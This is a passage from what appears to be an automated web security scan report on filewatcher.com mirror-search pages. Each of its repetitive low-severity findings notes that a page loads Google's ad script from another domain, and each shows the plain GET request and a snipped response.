Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 778
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub-2.2.tbz - FTP Mirror Search
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.1020. http://www.filewatcher.com/m/aub-2.2.tbz.41895.0.0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/m/aub-2.2.tbz.41895.0.0.html

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /m/aub-2.2.tbz.41895.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:02:33 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "zAEVqMLXz/1aYk+nBH7RGQ"
Content-Length: 21762
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:02:33 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 778
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub-2.2.tbz - FTP Mirror Search
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.1021. http://www.filewatcher.com/m/aub-2.2.tbz.41897.0.0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/m/aub-2.2.tbz.41897.0.0.html

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /m/aub-2.2.tbz.41897.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:02:26 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "XHgUPpwNlkOGmPMQ0rk2Tg"
Content-Length: 21579
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:02:26 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 773
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub-2.2.tbz - FTP Mirror Search
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.1022. http://www.filewatcher.com/m/aub-2.2.tbz.41898.0.0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/m/aub-2.2.tbz.41898.0.0.html

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /m/aub-2.2.tbz.41898.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:02:47 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "6LB0z+qMl/0uVZEkPpFCDA"
Content-Length: 16403
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:02:47 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 777
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub-2.2.tbz - FTP Mirror Search
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.1023. http://www.filewatcher.com/m/aub-2.2.tbz.41904.0.0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/m/aub-2.2.tbz.41904.0.0.html

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /m/aub-2.2.tbz.41904.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:02:38 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "WcqJbHTd54gNXNC5hgBlWg"
Content-Length: 21138
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:02:38 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 776
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub-2.2.tbz - FTP Mirror Search
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.1024. http://www.filewatcher.com/m/aub-2.2.tbz.41906.0.0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/m/aub-2.2.tbz.41906.0.0.html

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /m/aub-2.2.tbz.41906.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:02:28 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "85k8CGq+qFamMFb1dh5TQg"
Content-Length: 21831
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:02:28 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 773
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub-2.2.tbz - FTP Mirror Search
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.1025. http://www.filewatcher.com/m/aub-2.2.tbz.41911.0.0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/m/aub-2.2.tbz.41911.0.0.html

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /m/aub-2.2.tbz.41911.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:02:25 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "XpLlN/7Z27CnJQ9DL7B7sA"
Content-Length: 22119
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:02:25 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 770
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub-2.2.tbz - FTP Mirror Search
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.1026. http://www.filewatcher.com/m/aub-2.2.tbz.41917.0.0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/m/aub-2.2.tbz.41917.0.0.html

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /m/aub-2.2.tbz.41917.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:02:41 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "UejfL8jpUPEBK2PdkLB0Dg"
Content-Length: 21354
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:02:41 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 776
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub-2.2.tbz - FTP Mirror Search
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.1027. http://www.filewatcher.com/m/aub-2.2.tbz.41941.0.0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/m/aub-2.2.tbz.41941.0.0.html

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /m/aub-2.2.tbz.41941.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:02:39 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "dj5qP6M2h12GcICElj1/vg"
Content-Length: 22083
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:02:39 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 777
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub-2.2.tbz - FTP Mirror Search
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.1028. http://www.filewatcher.com/m/aub.0.0.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/m/aub.0.0.htm

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /m/aub.0.0.htm HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:02:13 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "m2W0T7atCBwRMiXTTWNtwQ"
Content-Length: 20467
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:02:13 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 762
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub - FTP Directory Mirror Searc
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.1029. http://www.filewatcher.com/m/aub.1.2179.0.0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/m/aub.1.2179.0.0.html

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /m/aub.1.2179.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:02:17 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "DG9YrqU0iVw29aWpeVHqqw"
Content-Length: 21470
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:02:17 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 769
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub.1 - FTP Mirror Search (Downl
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.1030. http://www.filewatcher.com/m/aub.2.0.5.shar.124341.0.0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/m/aub.2.0.5.shar.124341.0.0.html

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /m/aub.2.0.5.shar.124341.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:02:48 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "wag9nuqX8Xjt29g4K3K5+A"
Content-Length: 15071
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:02:48 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 777
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub.2.0.5.shar - FTP Mirror Sear
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.1031. http://www.filewatcher.com/m/aub.85833.0.0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/m/aub.85833.0.0.html

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /m/aub.85833.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:02:19 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "QtGV5EV7XaZKOYaaxaYI0A"
Content-Length: 19472
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:02:19 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 768
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub - FTP Mirror Search (Downloa
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.1032. http://www.filewatcher.com/m/aub.tbz.18.0.0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/m/aub.tbz.18.0.0.html

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /m/aub.tbz.18.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:02:12 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "fI4m/RDL4hoeX1Hvixgl9w"
Content-Length: 22209
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:02:12 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 754
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub.tbz - FTP Mirror Search (Dow
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.1033. http://www.filewatcher.com/m/aub.tbz.20.0.0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/m/aub.tbz.20.0.0.html

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /m/aub.tbz.20.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:02:13 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "yyQ2NliWXNcaSh5000D3gA"
Content-Length: 23181
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:02:13 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 764
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub.tbz - FTP Mirror Search (Dow
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.1034. http://www.filewatcher.com/m/aub.tgz.20.0.0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/m/aub.tgz.20.0.0.html

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /m/aub.tgz.20.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:02:21 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "dU9PcoWeSO3QTEVZzkBXxg"
Content-Length: 23046
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:02:21 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 772
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub.tgz - FTP Mirror Search (Dow
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.1035. http://www.filewatcher.com/p/aub-2.0.5-10.noarch.rpm.73595.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/p/aub-2.0.5-10.noarch.rpm.73595.htm

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /p/aub-2.0.5-10.noarch.rpm.73595.htm HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:03:05 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "0c7413gyby6K3GI+43dUow"
Content-Length: 5716
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:03:05 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 811
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub-2.0.5-10.noarch.rpm/ - Packa
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.1036. http://www.filewatcher.com/p/aub-2.0.5-10.src.rpm.82336.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/p/aub-2.0.5-10.src.rpm.82336.htm

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /p/aub-2.0.5-10.src.rpm.82336.htm HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:03:06 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "m6iBXUpTBmHOzXQ2DNan1A"
Content-Length: 4216
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:03:06 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 810
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub-2.0.5-10.src.rpm/ - Package
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.1037. http://www.filewatcher.com/p/aub-2.0.5.tgz.32459.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/p/aub-2.0.5.tgz.32459.htm

Issue detail

The response dynamically includes the following script from another domain:

